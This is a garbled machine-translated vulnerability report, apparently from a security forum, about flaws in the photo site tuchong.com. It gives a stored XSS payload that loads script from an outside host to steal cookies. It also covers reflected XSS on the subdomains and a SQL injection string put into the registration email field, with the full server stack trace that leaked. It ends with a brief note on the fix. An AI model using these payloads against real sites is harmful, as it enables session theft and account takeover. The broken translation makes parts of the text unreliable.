This is a big hazard. For cookies, you only need to get the account + MD5 password, and then ......
Http://tuchong.com/settings/
Registered configuration here:
Insert in the tag:
A> <script/src = // tmxk.org>; <! -- <
Save.
My homepage is triggered \ (^ o ^ )/~
Http://tuchong.com/272288/
This... I tested it myself and found that the risk of cookie Theft is high --
There is also a reflective xss:
Tochong.com so the sub-site xxxxx.tuchong.com /? View = list all have Xss vulnerabilities
Other reflective Xss have a bunch of hopes that tuchong can fix them. The Escape code is used for filtering...
Zend configuration is not well configured, and there are many burst paths ..
Google site: tuchong.com php
Or give a column www.2cto.com.
Registration:
<Input type = "text" required = "" id = "regEmail" name = "user_email">
User_email I changed to [0x7c or '1' = '1' #]
{"Result": "ERROR", "message": "SQLSTATE [HY093]: Invalid parameter number: no parameters were bound", "code": "HY093 ", "trace": [{"file": "\/srv \/http \/tuchong \/library \/Jezo \/Db \/Adapter. php "," line ": 945," function ":" execute "," class ":" PDOStatement "," type ":"-> "," args ": [[]}, {"file": "\/srv \/http \/tuchong \/library \/Jezo \/Db \/TableSelect. php "," line ": 155," function ":" query "," class ":" Jezo_Db_Adapter "," type ":"-> "," args ": [{}] },{ "file": "\/srv \/http \/tuchong \/application \/api \/controllers \/AccountController. php "," line ": 297," function ":" fetchRow "," class ":" Jezo_Db_TableSelect "," type ":"-> "," args ": []}, {"file": "\/srv \/http \/tuchong \/library \/Zend \/Controller \/Action. php "," line ": 513," function ":" registerAction "," class ":" AccountController "," type ":"-> "," args ": []}, {"file": "\/srv \/http \/tuchong \/library \/Zend \/Controller \/Dispatcher \/Standard. php "," line ": 295," function ":" dispatch "," class ":" Zend_Controller_Action "," type ":"-> "," args ": ["registerAction"] },{ "file": "\/srv \/http \/tuchong \/library \/Zend \/Controller \/Front. php "," line ": 954," function ":" dispatch "," class ":" Zend_Controller_Dispatcher_Standard "," type ":"-> "," args ": [{}, {"headersSentThrowsException": true}] },{ "file ": "\/srv \/http \/tuchong \/library \/Zend \/Application \/Bootstrap. php "," line ": 97," function ":" dispatch "," class ":" Zend_Controller_Front "," type ":"-> "," args ": []}, {"file": "\/srv \/http \/tuchong \/library \/Zend \/Application. php "," line ": 366," function ":" run "," class ":" Zend_Application_Bootstrap_Bootstrap "," type ":"-> "," args ": []}, {"file": "\/srv \/http \/tuchong \/public \/api. php "," line ": 38," function ":" run "," class ":" Zend_Application "," type ":"-> "," args ": []}
Other--| no more .....
Solution:
This escape code is used for filtering... zend is configured.
Author _ edevil